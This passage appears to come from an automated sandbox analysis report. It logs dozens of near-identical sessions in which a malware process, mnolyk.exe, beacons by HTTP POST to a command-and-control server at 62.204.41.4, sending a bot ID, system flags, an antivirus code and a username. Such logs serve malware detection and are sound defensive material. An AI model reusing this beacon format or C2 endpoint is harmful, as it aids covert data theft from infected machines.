                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      141192.168.2.74986762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:33.500442982 CET586OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:33.564363956 CET587INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      142192.168.2.74986862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:33.899866104 CET588OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:33.962744951 CET588INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      143192.168.2.74986962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:34.178044081 CET589OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:34.246464968 CET589INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      144192.168.2.74987062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:34.488373995 CET590OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:34.551070929 CET590INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      145192.168.2.74987162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:35.146965981 CET591OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:35.213232040 CET591INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      146192.168.2.74987262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:35.424115896 CET592OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:35.490262032 CET592INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      147192.168.2.74987362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:36.003659964 CET593OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:36.069278955 CET593INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      148192.168.2.74987462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:36.510726929 CET594OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:36.575668097 CET594INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      149192.168.2.74987562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:36.759661913 CET595OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:36.823663950 CET595INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      15192.168.2.74973962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:01.266268015 CET447OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:01.331387043 CET447INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      150192.168.2.74987662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:37.001688957 CET596OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:37.067255020 CET596INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      151192.168.2.74987762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:37.241185904 CET597OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:37.303318977 CET597INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      152192.168.2.74987862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:37.478497982 CET598OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:37.544193983 CET598INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      153192.168.2.74987962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:37.726488113 CET599OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:37.790949106 CET599INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      154192.168.2.74988062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:37.960429907 CET600OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:38.026807070 CET600INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      155192.168.2.74988162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:38.196455002 CET601OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:38.263988972 CET601INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      156192.168.2.74988262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:38.444359064 CET602OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:38.507621050 CET602INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      157192.168.2.74988362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:38.704699993 CET603OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:38.772583961 CET603INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      158192.168.2.74988462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:38.947005987 CET604OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.011766911 CET604INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      159192.168.2.74988562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:39.224149942 CET605OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
